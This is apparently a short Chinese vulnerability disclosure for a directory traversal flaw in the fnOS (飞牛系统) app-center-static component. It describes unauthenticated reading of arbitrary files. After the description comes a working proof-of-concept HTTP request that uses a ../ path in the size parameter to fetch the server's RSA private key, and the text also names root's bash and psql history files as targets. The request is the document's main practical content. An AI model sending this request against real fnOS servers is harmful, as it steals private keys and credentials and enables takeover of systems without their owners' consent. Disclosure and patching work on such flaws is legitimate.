漏洞描述
飞牛系统(fnOS)app-center-static存在目录遍历导致的列目录和文件读取漏洞,未授权的攻击者可利用该漏洞读取服务器系统上任意文件如私钥(/usr/trim/etc/rsa_private_key.pem)、历史记录(/root/.bash_history)等敏感信息(/root/.psql_history),进而可能导致服务器失陷
飞牛fnOS 存在目录遍历漏洞
PoC代码
GET /app-center-static/serviceicon/myapp/{0}/?size=../../../../../../../../../../../../usr/trim/etc/rsa_private_key.pem HTTP/1.1
Host:
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive